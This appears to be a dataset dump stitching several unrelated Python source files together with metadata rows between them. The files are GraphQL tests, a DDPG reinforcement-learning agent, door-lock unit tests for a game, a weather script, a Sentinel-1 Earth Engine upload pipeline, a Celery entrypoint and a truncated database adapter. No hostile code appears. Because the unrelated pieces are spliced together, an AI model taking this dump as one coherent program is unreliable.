app = GraphQL(schema, error_formatter=error_formatter)
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{"type": GQL_START, "id": "test1", "payload": {"query": "subscription {"}}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_ERROR
assert response["id"] == "test1"
error_formatter.assert_called_once()
def test_custom_error_formatter_is_used_to_format_subscription_source_error(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, error_formatter=error_formatter)
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { sourceError }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
assert response["id"] == "test1"
error_formatter.assert_called_once()
def test_custom_error_formatter_is_used_to_format_subscription_resolver_error(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, error_formatter=error_formatter)
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { resolverError }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
assert response["id"] == "test1"
error_formatter.assert_called_once()
def test_error_formatter_is_called_with_debug_enabled(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, debug=True, error_formatter=error_formatter)
execute_failing_query(app)
error_formatter.assert_called_once_with(ANY, True)
def test_error_formatter_is_called_with_debug_disabled(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, debug=False, error_formatter=error_formatter)
execute_failing_query(app)
error_formatter.assert_called_once_with(ANY, False)
class CustomExtension(Extension):
async def resolve(self, next_, parent, info, **kwargs):
return next_(parent, info, **kwargs).lower()
def test_extension_from_option_are_passed_to_query_executor(schema):
app = GraphQL(schema, extensions=[CustomExtension])
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "hello, bob!"}}
def test_extensions_function_result_is_passed_to_query_executor(schema):
def get_extensions(*_):
return [CustomExtension]
app = GraphQL(schema, extensions=get_extensions)
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "hello, bob!"}}
def test_async_extensions_function_result_is_passed_to_query_executor(schema):
async def get_extensions(*_):
return [CustomExtension]
app = GraphQL(schema, extensions=get_extensions)
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "hello, bob!"}}
def middleware(next_fn, *args, **kwargs):
value = next_fn(*args, **kwargs)
return f"**{value}**"
def test_middlewares_are_passed_to_query_executor(schema):
app = GraphQL(schema, middleware=[middleware])
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "**Hello, BOB!**"}}
def test_middleware_function_result_is_passed_to_query_executor(schema):
def get_middleware(*_):
return [middleware]
app = GraphQL(schema, middleware=get_middleware)
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "**Hello, BOB!**"}}
def test_async_middleware_function_result_is_passed_to_query_executor(schema):
async def get_middleware(*_):
return [middleware]
app = GraphQL(schema, middleware=get_middleware)
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "**Hello, BOB!**"}}
| 36.524355
| 87
| 0.672394
| 146
| 0.011454
| 0
| 0
| 0
| 0
| 305
| 0.023927
| 1,867
| 0.146466
|
b18afbecdd582dccbd726f5d982378f6fc6adc50
| 7,056
|
py
|
Python
|
OpenAI-Gym/agents/ddpg.py
|
stmobo/Machine-Learning
|
83f69c7afb0a4bc1dc94482b8d23805e8ab2acde
|
[
"MIT"
] | 2
|
2017-09-26T04:39:04.000Z
|
2017-10-12T08:57:51.000Z
|
OpenAI-Gym/agents/ddpg.py
|
stmobo/Machine-Learning
|
83f69c7afb0a4bc1dc94482b8d23805e8ab2acde
|
[
"MIT"
] | null | null | null |
OpenAI-Gym/agents/ddpg.py
|
stmobo/Machine-Learning
|
83f69c7afb0a4bc1dc94482b8d23805e8ab2acde
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import prettytensor as pt
import numpy as np
import gym
import math
import random
from collections import deque
from agents import mixed_network, spaces, replay_buffer
tensorType = tf.float32
"""
Implements a Deep Deterministic Policy Gradient agent.
Adjustable parameters:
- Actor / Critic learning rates
- Temporal Difference discount factor
- Experience Replay buffer / batch sizes
"""
class DDPGAgent:
"""
Creates a new DDPG agent.
Args:
- actorGen and criticGen should be functions that create new
neural networks with supplied Placeholder input Tensors.
- state_shape will be the shape of the state input Placeholder.
- action_shape should be the shape of the tensors output by the
actor neural network.
- buf_sz is the size of the agent's internal experience replay buffer.
- batch_sz will be the size of each training batch (drawn from the replay buffer)
"""
def __init__(self, actorGen, criticGen, state_shape, action_shape, buf_sz=100000,
batch_sz=64, critic_learning_rate=0.001, actor_learning_rate=0.0001,
discount_factor=0.99, actor_mix_factor=0.001,
critic_mix_factor=0.001, actor_gradient_clipping=None, critic_gradient_clipping=None):
self.graph = tf.Graph()
self.session = tf.Session(graph=self.graph)
self.discount_factor = discount_factor
self.replay_buf = deque(maxlen=buf_sz)
self.batch_size = batch_sz
self.state_shape = state_shape
self.action_shape = action_shape
self.__single_state_shape = self.state_shape[:]
self.__single_state_shape[0] = 1
with self.graph.as_default():
self.state_in = tf.placeholder(tensorType, state_shape, name='state-in')
self.action_in = tf.placeholder(tensorType, action_shape, name='action-in')
with tf.variable_scope('critic'):
self.critic = mixed_network.MixedNetwork(self.graph, self.session,
tf.concat_v2([self.state_in, self.action_in], axis=1),
criticGen, target_mix_factor=critic_mix_factor,
prefix='critic/')
self.critic_prediction = tf.placeholder(tensorType, [None])
self.critic_loss = tf.reduce_mean( tf.square( self.critic_prediction - tf.squeeze(self.critic.main_out) ) )
critic_optimizer = tf.train.AdamOptimizer(critic_learning_rate)
if isinstance(critic_gradient_clipping, tuple):
critic_gradients = critic_optimizer.compute_gradients(self.critic_loss, self.critic.main_parameters)
clipped_grads = [ \
( tf.clip_by_value(gv[0], critic_gradient_clipping[0], critic_gradient_clipping[1]), gv[1]) \
for gv in critic_gradients ]
self.critic_optimize = critic_optimizer.apply_gradients(clipped_grads)
else:
self.critic_optimize = critic_optimizer.minimize(self.critic_loss, var_list=self.critic.main_parameters)
# gradient of the critic network w.r.t. the actions, averaged over all (s,a) pairs in batch
self.action_gradient = tf.div(tf.gradients(self.critic.main_out, self.action_in), tf.constant(self.batch_size, tensorType))
with tf.variable_scope('actor'):
self.actor = mixed_network.MixedNetwork(self.graph,
self.session, self.state_in, actorGen, prefix='actor/',
target_mix_factor=actor_mix_factor)
#self.aGrad_pl = tf.placeholder(tensorType, action_shape, name='action-gradient-placeholder')
self.actor_gradients = tf.gradients(self.actor.main_out, self.actor.main_parameters, self.action_gradient)
#self.actor_optimize = [p.assign(p + actor_learning_rate*g) \
#for p, g in zip(self.actor.main_parameters, self.actor_gradients)]
#self.actor_optimize = tf.train.GradientDescentOptimizer(actor_learning_rate).apply_gradients(
# zip(self.actor_gradients, self.actor.main_parameters)
#)
if isinstance(actor_gradient_clipping, tuple):
self.actor_gradients = [tf.clip_by_value(g, actor_gradient_clipping[0], actor_gradient_clipping[1]) for g in self.actor_gradients]
self.actor_gradients = [tf.negative(g) for g in self.actor_gradients]
self.actor_optimize = tf.train.AdamOptimizer(actor_learning_rate).apply_gradients(
zip(self.actor_gradients, self.actor.main_parameters)
)
self.session.run(tf.global_variables_initializer())
def act(self, observation):
return self.actor.get_main({ self.state_in: np.reshape(observation, self.__single_state_shape)})
def add_experience(self, state, action, reward, done, next_state):
self.replay_buf.append( (state, action, reward, done, next_state) )
def train(self):
sm = random.sample(self.replay_buf, min(len(self.replay_buf), self.batch_size))
state_shape = self.state_shape[:]
action_shape = self.action_shape[:]
state_shape[0] = action_shape[0] = len(sm)
states = np.reshape([ ts[0] for ts in sm ], state_shape)
actions = np.reshape([ ts[1] for ts in sm ], action_shape)
rewards = np.reshape([ ts[2] for ts in sm ], [len(sm)])
term_state = np.reshape([ ts[3] for ts in sm ], [len(sm)])
next_states = np.reshape([ ts[4] for ts in sm ], state_shape)
# Use target actor and critic networks to estimate TD targets
target_a = np.reshape(self.actor.get_target({self.state_in:next_states}), action_shape)
target_q = np.reshape(self.critic.get_target({ self.state_in:next_states, self.action_in:target_a }), [len(sm)])
td_targets = []
for i, t in enumerate(target_q):
if term_state[i]:
td_targets.append(rewards[i])
else:
td_targets.append(rewards[i] + (self.discount_factor * t))
_, crit_loss, predicted_q = self.session.run([self.critic_optimize, self.critic_loss, self.critic.main_out], {
self.state_in: states,
self.action_in: actions,
self.critic_prediction: np.squeeze(td_targets)
})
net_actions = np.reshape(self.actor.get_main({self.state_in: states}), action_shape)
self.session.run(self.actor_optimize, {self.state_in:states, self.action_in:net_actions})
#self.session.run(self.actor_optimize, {self.state_in:states, self.action_in:actions})
#actor_grad = self.session.run(self.actor_gradients, {self.state_in:states, self.action_in:net_actions})[0]
#assert not np.isnan(np.sum(actor_grad))
return np.squeeze(predicted_q), crit_loss
def update_targets(self):
self.actor.update_target()
self.critic.update_target()
| 45.230769
| 150
| 0.658872
| 6,635
| 0.940334
| 0
| 0
| 0
| 0
| 0
| 0
| 1,514
| 0.214569
|
b18b42a0184f3b3519a30ad5c379fbaef6c9cbc7
| 14,426
|
py
|
Python
|
tests/unit/test_door.py
|
buxx/rolling
|
ef1268fe6ddabe768a125c3ce8b37e0b9cbad4a5
|
[
"MIT"
] | 14
|
2019-11-16T18:51:51.000Z
|
2022-01-15T17:50:34.000Z
|
tests/unit/test_door.py
|
buxx/rolling
|
ef1268fe6ddabe768a125c3ce8b37e0b9cbad4a5
|
[
"MIT"
] | 148
|
2018-12-10T09:07:45.000Z
|
2022-03-08T10:51:04.000Z
|
tests/unit/test_door.py
|
buxx/rolling
|
ef1268fe6ddabe768a125c3ce8b37e0b9cbad4a5
|
[
"MIT"
] | 1
|
2020-08-05T14:25:48.000Z
|
2020-08-05T14:25:48.000Z
|
from aiohttp.test_utils import TestClient
import pytest
import typing
import unittest.mock
from rolling.kernel import Kernel
from rolling.model.character import CharacterModel
from rolling.model.character import MINIMUM_BEFORE_EXHAUSTED
from rolling.server.document.affinity import AffinityDirectionType
from rolling.server.document.affinity import AffinityJoinType
from rolling.server.document.affinity import CHIEF_STATUS
from rolling.server.document.affinity import MEMBER_STATUS
from rolling.server.document.build import BuildDocument
from rolling.server.document.build import DOOR_MODE_LABELS
from rolling.server.document.build import DOOR_MODE__CLOSED
from rolling.server.document.build import DOOR_MODE__CLOSED_EXCEPT_FOR
from rolling.server.document.build import DoorDocument
@pytest.fixture
def websocket_prepare_mock() -> typing.Generator[unittest.mock.AsyncMock, None, None]:
with unittest.mock.patch("aiohttp.web_ws.WebSocketResponse.prepare") as mock_:
yield mock_
@pytest.fixture
def zone_event_manager_listen_mock() -> typing.Generator[
unittest.mock.AsyncMock, None, None
]:
with unittest.mock.patch(
"rolling.server.zone.websocket.ZoneEventsManager._listen"
) as mock_:
yield mock_
@pytest.fixture
def zone_event_manager_close_mock() -> typing.Generator[
unittest.mock.AsyncMock, None, None
]:
with unittest.mock.patch(
"rolling.server.zone.websocket.ZoneEventsManager.close_websocket"
) as mock_:
yield mock_
@pytest.fixture
def socket_send_str_mock() -> typing.Generator[unittest.mock.AsyncMock, None, None]:
with unittest.mock.patch("aiohttp.web_ws.WebSocketResponse.send_str") as mock_:
yield mock_
class TestDoor:
def _place_door(self, kernel: Kernel) -> DoorDocument:
build = kernel.build_lib.place_build(
world_row_i=1,
world_col_i=1,
zone_row_i=10,
zone_col_i=10,
build_id="DOOR",
under_construction=False,
)
return build
def _create_rule(
self,
kernel: Kernel,
author: CharacterModel,
door: BuildDocument,
mode: str,
affinity_ids: typing.Optional[typing.List[int]],
) -> None:
kernel.door_lib.update(
character_id=author.id,
build_id=door.id,
new_mode=mode,
new_affinity_ids=affinity_ids,
)
def test_one_rule_lock__author_here__stranger_cant(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
def test_one_rule_lock_except__author_here__stranger_cant_but_member_can(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_franck_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
franck = worldmapc_franck_model
# Given
aff = kernel.affinity_lib.create(
name="aff1",
join_type=AffinityJoinType.ACCEPT_ALL,
direction_type=AffinityDirectionType.ONE_DIRECTOR,
)
kernel.affinity_lib.join(
character_id=xena.id,
affinity_id=aff.id,
accepted=True,
request=False,
status_id=CHIEF_STATUS[0],
)
kernel.affinity_lib.join(
character_id=franck.id,
affinity_id=aff.id,
accepted=True,
request=False,
status_id=MEMBER_STATUS[0],
)
door = self._place_door(kernel)
self._create_rule(
kernel,
author=xena,
door=door,
mode=DOOR_MODE__CLOSED_EXCEPT_FOR,
affinity_ids=[aff.id],
)
# When
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=franck.id
)
def test_two_rule_lock__author_here_and_first_can__stranger_second_cant(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
self._create_rule(
kernel, author=arthur, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
async def test_two_rule_lock__author_first_travel__stranger_second_can(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
self._create_rule(
kernel, author=arthur, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When/Then 1
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
await kernel.character_lib.move(
character=xena,
to_world_row=2,
to_world_col=2,
)
# When/Then 2
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
await kernel.character_lib.move(
character=xena,
to_world_row=1,
to_world_col=1,
)
# When/Then 3
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
async def test_one_rule_lock__author_first_travel__stranger_second_can(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When/Then 1
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
await kernel.character_lib.move(
character=xena,
to_world_row=2,
to_world_col=2,
)
# When/Then 2
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
await kernel.character_lib.move(
character=xena,
to_world_row=1,
to_world_col=1,
)
# When/Then 3
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
async def test_one_rule_lock__author_dead__stranger_can(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When/Then 1
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
kernel.character_lib.kill(character_id=xena.id)
# When/Then 2
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
async def test_one_rule_lock__author_vulnerable__stranger_can(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When/Then 1
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
xena_doc = kernel.character_lib.get_document(xena.id)
xena_doc.tiredness = MINIMUM_BEFORE_EXHAUSTED + 1
kernel.server_db_session.add(xena_doc)
kernel.server_db_session.commit()
xena = kernel.character_lib.get(id_=xena.id)
assert xena.vulnerable
# When/Then 2
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
@pytest.mark.usefixtures("websocket_prepare_mock")
@pytest.mark.usefixtures("zone_event_manager_listen_mock")
@pytest.mark.usefixtures("zone_event_manager_close_mock")
async def test_events_when_door_author_left_when_back_in_zone(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
socket_send_str_mock: unittest.mock.AsyncMock,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
request_mock = unittest.mock.AsyncMock()
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
_ = await kernel.server_zone_events_manager.get_new_socket(
request=request_mock,
row_i=1,
col_i=1,
character_id=arthur.id,
)
# When
await kernel.character_lib.move(
character=xena,
to_world_row=1,
to_world_col=2,
)
# Then
socket_send_str_mock.assert_awaited()
events_str_list = [arg[0][0] for arg in socket_send_str_mock.await_args_list]
assert any(["NEW_BUILD" in event_str for event_str in events_str_list])
assert any(['{"WALKING":true}' in event_str for event_str in events_str_list])
# When
socket_send_str_mock.reset_mock()
await kernel.character_lib.move(
character=xena,
to_world_row=1,
to_world_col=1,
)
# Then
socket_send_str_mock.assert_awaited()
events_str_list = [arg[0][0] for arg in socket_send_str_mock.await_args_list]
assert any(["NEW_BUILD" in event_str for event_str in events_str_list])
assert any(['{"WALKING":false}' in event_str for event_str in events_str_list])
@pytest.mark.usefixtures("websocket_prepare_mock")
@pytest.mark.usefixtures("zone_event_manager_listen_mock")
@pytest.mark.usefixtures("zone_event_manager_close_mock")
async def test_events_when_door_author_update_rule(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
socket_send_str_mock: unittest.mock.AsyncMock,
worldmapc_web_app: TestClient,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
request_mock = unittest.mock.AsyncMock()
web = worldmapc_web_app
# Given
door = self._place_door(kernel)
_ = await kernel.server_zone_events_manager.get_new_socket(
request=request_mock,
row_i=1,
col_i=1,
character_id=arthur.id,
)
# When
response = await web.post(
f"/character/{xena.id}/door/{door.id}?mode={DOOR_MODE_LABELS[DOOR_MODE__CLOSED]}"
)
assert response.status == 200
# Then
socket_send_str_mock.assert_awaited()
events_str_list = [arg[0][0] for arg in socket_send_str_mock.await_args_list]
assert any(["NEW_BUILD" in event_str for event_str in events_str_list])
assert any(['{"WALKING":false}' in event_str for event_str in events_str_list])
| 32.272931
| 93
| 0.643768
| 12,714
| 0.881325
| 848
| 0.058783
| 4,297
| 0.297865
| 8,305
| 0.575697
| 864
| 0.059892
|
b18c5f15c9a68336330b6b76a56071233826bf51
| 1,311
|
py
|
Python
|
myWeather2_github.py
|
RCElectronic/weatherlight
|
5d70b5bdbb67396620c211399c502b801878667f
|
[
"MIT"
] | null | null | null |
myWeather2_github.py
|
RCElectronic/weatherlight
|
5d70b5bdbb67396620c211399c502b801878667f
|
[
"MIT"
] | null | null | null |
myWeather2_github.py
|
RCElectronic/weatherlight
|
5d70b5bdbb67396620c211399c502b801878667f
|
[
"MIT"
] | null | null | null |
# myWeather.py for inkyphat and RPiZW
print('Starting')
try:
import requests
print('requests module imported')
except:
print('Sorry, need to install requests module')
exit()
wx_url = 'api.openweathermap.org/data/2.5/weather?'
wx_city = 'q=Quispamsis,CA&units=metric'
wx_cityID = 'id=6115383&units=metric'
api_key = '&APPID='+'ENTER YOUR API KEY HERE'
try:
resp = requests.get('http://'+wx_url+wx_cityID+api_key)
print('got data')
except:
print('Cannot connect to service...')
exit()
if resp.status_code != 200:
raise ApiError('GET /weather/ {}'.format(resp.status_code))
try:
city=resp.json()["name"]
temperature=resp.json()["main"]["temp"] # in celcius
pressure=resp.json()["main"]["pressure"] # in hPa
humidity=resp.json()["main"]["humidity"] # in %
windSpeed = resp.json()["wind"]["speed"] # in m/s
windDeg = resp.json()["wind"]["deg"]
print('got json info')
except:
print('Cannot read data in api call...')
exit()
print('Weather in', city+':')
print('\tTemperature:\t',str(temperature)+'°C')
print('\tPressure:\t',pressure,'hPa')
print('\tWind:\t\t',windSpeed,'m/s from',str(windDeg)+'°')
print('\tWind:\t\t',
round(windSpeed*0.277778,1),'km/h from',str(windDeg)+'°')
| 30.488372
| 64
| 0.617849
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 586
| 0.445967
|
b18cdd01036a990db77da457c825c577e134e9df
| 4,526
|
py
|
Python
|
push-to-gee.py
|
Servir-Mekong/sentinel-1-pipeline
|
79ccba65d974aa5c337adc4d72fa1df8ef75d20c
|
[
"MIT"
] | 16
|
2020-04-19T12:54:55.000Z
|
2022-03-24T18:59:32.000Z
|
push-to-gee.py
|
Servir-Mekong/sentinel-1-pipeline
|
79ccba65d974aa5c337adc4d72fa1df8ef75d20c
|
[
"MIT"
] | 2
|
2021-04-30T21:14:14.000Z
|
2021-06-02T01:39:56.000Z
|
push-to-gee.py
|
Servir-Mekong/sentinel-1-pipeline
|
79ccba65d974aa5c337adc4d72fa1df8ef75d20c
|
[
"MIT"
] | 1
|
2021-04-21T08:58:12.000Z
|
2021-04-21T08:58:12.000Z
|
# -*- coding: utf-8 -*-
from dotenv import load_dotenv
load_dotenv('.env')
import logging
logging.basicConfig(filename='logs/push-2-gee.log', level=logging.INFO)
import ast
import glob
import json
import os
import subprocess
from datetime import datetime
from dbio import *
scale_factor = 10000
output_path = os.getenv('OUTPUT_PATH')
final_output = os.getenv('POST_PROCESS_OUTPUT_PATH')
gdal_path = os.getenv('GDAL_PATH')
manifest_dir = os.getenv('MANIFESTS_PATH')
cloud_path = os.getenv('GCS_PATH')
gee_asset_path = os.getenv('GEE_ASSET_PATH')
calc = '{0}gdal_calc.py -A %s --calc="A*{1}" --outfile={2}%s --type=UInt16'.format(gdal_path, scale_factor, final_output)
_cp_to_gs = 'gsutil cp {0}%s {1}'.format(final_output, cloud_path)
_upload_to_gee = 'earthengine upload image --manifest "{0}%s.json"'.format(manifest_dir)
properties = ['acquisitiontype', 'lastorbitnumber', 'lastrelativeorbitnumber', 'missiondatatakeid', 'orbitdirection',
'orbitnumber', 'platformidentifier', 'polarisationmode', 'producttype', 'relativeorbitnumber',
'sensoroperationalmode', 'swathidentifier']
def get_processed_images(table_name):
query = "SELECT id, title, beginposition, endposition, {} FROM {} WHERE processed={} AND slave={} " \
"AND uploadedtogs={} ORDER BY title;".format(','.join(properties), table_name, True, False, False)
return get_query(query)
def main():
table_name = os.getenv('TABLE_NAME')
processed_images = get_processed_images(table_name)
for image in processed_images:
output_files = glob.glob(output_path + '*{}*.tif'.format(image[1]))
# push to gee
# name
manifest_name = '{}/{}'.format(gee_asset_path, image[1])
# tilesets and bands
manifest_tilesets = []
manifest_bands = []
for index, output in enumerate(output_files):
file_name = output.split(output_path)[1]
# convert to uint 16
calc_command = calc % (output, file_name)
result = subprocess.check_output(calc_command, shell=True)
print(result)
# push to gs
cp_to_gs = _cp_to_gs % (file_name)
result = subprocess.check_output(cp_to_gs, shell=True)
print(result)
if 'VH' in file_name:
tileset_id = 'tileset_for_band_VH_{}'.format(index)
band_id = 'VH'
elif 'VV' in file_name:
tileset_id = 'tileset_for_band_VV_{}'.format(index)
band_id = 'VV'
_tileset = {
'id': tileset_id,
'sources': [
{
'uris': [
'{}/{}'.format(cloud_path, file_name)
]
}
]
}
manifest_tilesets.append(_tileset)
_band = {
'id': band_id,
'tileset_id': tileset_id
}
manifest_bands.append(_band)
# properties
manifest_properties = {}
start_index = 4
for _property in properties:
manifest_properties[_property] = image[start_index]
start_index += 1
manifest_properties['scale_factor'] = scale_factor
# start time
manifest_start_time = {
'seconds': int(round((image[2] - datetime(1970, 1, 1)).total_seconds()))
}
# end time
manifest_end_time = {
'seconds': int(round((image[3] - datetime(1970, 1, 1)).total_seconds()))
}
final_manifest = {
'name': manifest_name,
'tilesets': manifest_tilesets,
'bands': manifest_bands,
'start_time': manifest_start_time,
'end_time': manifest_end_time,
'properties': manifest_properties
}
with open('{}{}.json'.format(manifest_dir, image[1]), 'w') as manifest_file:
json.dump(ast.literal_eval(json.dumps(final_manifest)), manifest_file, ensure_ascii=False, indent=4)
upload_to_gee = _upload_to_gee % (image[1])
result = subprocess.check_output(upload_to_gee, shell=True)
print(result)
if 'ID:' in result:
task_id = result.split("ID:")[1].strip()
# save the info
query = "UPDATE {} SET uploadedtogs=TRUE, ee_task_id='{}' WHERE id='{}'".format(table_name, task_id, image[0])
update_query(query)
if __name__ == '__main__':
main()
| 33.776119
| 122
| 0.592134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,073
| 0.237075
|
b18dfbe911fad785c5c6176e1eec4c5f85de7b49
| 938
|
py
|
Python
|
rabbitai/tasks/celery_app.py
|
psbsgic/rabbitai
|
769e120ba605d56ac076f810a549c38dac410c8e
|
[
"Apache-2.0"
] | null | null | null |
rabbitai/tasks/celery_app.py
|
psbsgic/rabbitai
|
769e120ba605d56ac076f810a549c38dac410c8e
|
[
"Apache-2.0"
] | null | null | null |
rabbitai/tasks/celery_app.py
|
psbsgic/rabbitai
|
769e120ba605d56ac076f810a549c38dac410c8e
|
[
"Apache-2.0"
] | 1
|
2021-07-09T16:29:50.000Z
|
2021-07-09T16:29:50.000Z
|
"""
This is the main entrypoint used by Celery workers. As such,
it needs to call create_app() in order to initialize things properly
"""
from typing import Any
from celery.signals import worker_process_init
# Rabbitai framework imports
from rabbitai import create_app
from rabbitai.extensions import celery_app, db
# Init the Flask app / configure everything
flask_app = create_app()
# Need to import late, as the celery_app will have been setup by "create_app()"
# pylint: disable=wrong-import-position, unused-import
from . import cache, schedules, scheduler # isort:skip
# Export the celery app globally for Celery (as run on the cmd line) to find
app = celery_app
@worker_process_init.connect
def reset_db_connection_pool(**kwargs: Any) -> None: # pylint: disable=unused-argument
with flask_app.app_context():
# https://docs.sqlalchemy.org/en/14/core/connections.html#engine-disposal
db.engine.dispose()
| 32.344828
| 87
| 0.765458
| 0
| 0
| 0
| 0
| 260
| 0.277186
| 0
| 0
| 535
| 0.570362
|
b18ee92e764bf93ddc723331ee49b72f1366542a
| 4,403
|
py
|
Python
|
adapters/adapter.py
|
ChristfriedBalizou/jeamsql
|
abd7735831b572f1f1a2d8e47b0759801fd5881c
|
[
"MIT"
] | null | null | null |
adapters/adapter.py
|
ChristfriedBalizou/jeamsql
|
abd7735831b572f1f1a2d8e47b0759801fd5881c
|
[
"MIT"
] | null | null | null |
adapters/adapter.py
|
ChristfriedBalizou/jeamsql
|
abd7735831b572f1f1a2d8e47b0759801fd5881c
|
[
"MIT"
] | null | null | null |
from tabulate.tabulate import tabulate
import subprocess
import sys
import os
import re
import csv
import io
import json
class Adapter(object):
def __init__(self,
server=None,
port=None,
user=None,
connection_cmd=None,
cmd=None,
test_query=None,
database=None,
error_regex=None,
password=None,
fmt="sql"):
'''
The init function contain the connection parameters
to initiate the database instance.
'''
self.server = server
self.port = port
self.user = user
self.database = database
self.password = password
self.cmd = cmd
